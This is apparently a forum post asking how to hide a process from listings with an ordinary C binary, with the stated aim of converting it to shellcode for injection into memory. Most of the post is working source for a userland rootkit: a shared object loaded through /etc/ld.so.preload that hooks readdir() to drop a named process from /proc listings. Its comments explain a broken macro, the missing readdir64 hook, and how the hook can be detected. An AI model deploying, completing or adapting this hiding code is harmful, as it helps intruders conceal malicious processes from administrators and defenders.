Using dirent in a regular binary

I wanted to see if it's possible to use dirent and readdir to hide a file in memory. I know it can be done using an LKM or shared object. I'm trying to do it with just a regular C binary, so that I could change that to shellcode easily and throw it into memory. I've got this code, which works as a shared object that one can hook in with /etc/ld.so.preload:

/* RTLD_NEXT is a GNU extension: dlfcn.h only declares it under _GNU_SOURCE,
 * which must be defined before the first system header is included. */
#define _GNU_SOURCE

#include <dirent.h>
#include <dlfcn.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Process name that the readdir() hook below drops from listings of /proc.
 * It is compared with strcmp() against the parenthesised name field of
 * /proc/<pid>/stat, so it has to match that field exactly. */

static const char* process_to_filter = "test";

/* Get a directory name given a DIR* handle */

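/* Get the path of the directory behind a DIR* handle.
 *
 * Resolves /proc/self/fd/<dirfd> with readlink(), so it only works where
 * /proc is mounted. On success the NUL-terminated path is stored in buf and
 * 1 is returned. Returns 0 when dirp/buf is NULL or size is 0, when dirfd()
 * or readlink() fail, or when the path does not fit in size - 1 bytes: a
 * truncated path would be silently mis-compared by the caller, so it is
 * reported as a failure rather than returned.
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size) {
    if (dirp == NULL || buf == NULL || size == 0) {
        return 0;
    }

    int fd = dirfd(dirp);
    if (fd == -1) {
        return 0;
    }

    char link[64];
    snprintf(link, sizeof link, "/proc/self/fd/%d", fd);

    /* readlink() does not NUL-terminate and may fill the whole buffer; keep
     * one byte free so the terminator written below stays in bounds. */
    ssize_t len = readlink(link, buf, size - 1);
    if (len < 0) {
        return 0;
    }
    if ((size_t)len == size - 1) {
        /* Buffer filled exactly: the target may be longer than what we got. */
        return 0;
    }

    buf[len] = '\0';
    return 1;
}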

/* Get a process name given its pid */

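/* Get a process name given its pid as a decimal string.
 *
 * Reads the first line of /proc/<pid>/stat and copies the parenthesised name
 * field into buf. buf must have room for at least 256 bytes: the scan is
 * bounded to 255 characters plus the terminator (the caller in this file
 * passes a 256-byte array). Returns 1 and fills buf on success. Returns 0 if
 * pid is NULL, empty or not all digits, if the stat file cannot be opened or
 * read, or if the line does not start with "<pid> (<name>"; buf is left
 * unspecified in that case, so callers must not read it.
 */
static int get_process_name(const char* pid, char* buf) {
    /* An empty string satisfies the strspn()/strlen() check trivially but
     * would build "/proc//stat", i.e. /proc/stat, which is not a process. */
    if (pid == NULL || buf == NULL || *pid == '\0') {
        return 0;
    }
    if (strspn(pid, "0123456789") != strlen(pid)) {
        return 0;
    }

    char path[64];
    int written = snprintf(path, sizeof path, "/proc/%s/stat", pid);
    if (written < 0 || (size_t)written >= sizeof path) {
        return 0;
    }

    FILE* f = fopen(path, "r");
    if (f == NULL) {
        return 0;
    }
    char line[275];
    char* got = fgets(line, sizeof line, f);
    fclose(f);
    if (got == NULL) {
        return 0;
    }

    /* The field width keeps the name inside buf; checking the conversion
     * count avoids returning success with buf still uninitialised. */
    int unused;
    if (sscanf(line, "%d (%255[^)]", &unused, buf) != 2) {
        return 0;
    }
    return 1;
}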

/* NOTE(review): as pasted, this macro has no body, so the two
 * DECLARE_READDIR() invocations at the end of the file expand to nothing but
 * a stray ';'. Presumably the line continuations of a macro that generated a
 * readdir/readdir64 pair were lost; only the readdir() written out below is
 * actually compiled. */
#define DECLARE_READDIR(dirent, readdir)

/* The libc readdir() this object wraps; resolved lazily on the first call of
 * the hook via dlsym(RTLD_NEXT, ...). */
static struct dirent* (*original_readdir)(DIR*) = NULL;

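/* Decide whether the hook should drop this entry: only when dirp is the /proc
 * directory itself and the entry is a pid whose name equals process_to_filter.
 * Any lookup failure means "show it". */
static int should_hide_entry(DIR *dirp, struct dirent *entry) {
    char dir_name[256];
    char process_name[256];

    if (!get_dir_name(dirp, dir_name, sizeof dir_name)) {
        return 0;
    }
    if (strcmp(dir_name, "/proc") != 0) {
        return 0;
    }
    if (!get_process_name(entry->d_name, process_name)) {
        return 0;
    }
    return strcmp(process_name, process_to_filter) == 0;
}

/* Interposed readdir(): resolves the real libc readdir through RTLD_NEXT on
 * the first call, then returns the next entry of dirp, skipping the ones
 * should_hide_entry() rejects. It only affects programs that load this
 * object (LD_PRELOAD / /etc/ld.so.preload) and call readdir(); a statically
 * linked lister, or a caller of readdir64() (no hook for it is defined
 * here), sees the unfiltered directory — which is also the practical way to
 * detect such a hook.
 *
 * Returns NULL at end of directory, on error from the real readdir, or when
 * the real readdir cannot be resolved (reported on stderr); calling a NULL
 * function pointer in that case would crash the host process.
 */
struct dirent* readdir(DIR *dirp) {
    if (original_readdir == NULL) {
        /* dlsym() takes the symbol name as a string; passing the bare
         * identifier hands it the function pointer instead. */
        original_readdir = dlsym(RTLD_NEXT, "readdir");
        if (original_readdir == NULL) {
            fprintf(stderr, "Error in dlsym: %s\n", dlerror());
            return NULL;
        }
    }

    struct dirent* entry;
    while ((entry = original_readdir(dirp)) != NULL) {
        if (!should_hide_entry(dirp, entry)) {
            break;
        }
    }
    return entry;
}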

/* NOTE(review): with DECLARE_READDIR defined without a body above, both of
 * these expand to a bare ';' at file scope. In particular no readdir64()
 * hook is generated, so programs that list /proc through readdir64() are not
 * filtered by this object. */
DECLARE_READDIR(dirent64, readdir64);

DECLARE_READDIR(dirent, readdir);

I don't know if this is even possible for hiding ports, pids, or files outside of an LKM or shared object. I've modified it to compile as a binary and have no errors or warnings with gcc -Wall -Wextra. I tried adding static too, but it doesn't seem to hide anything. Does anyone know how to do this? Or if I'm at a dead end?

submitted by /u/glued2thefloor

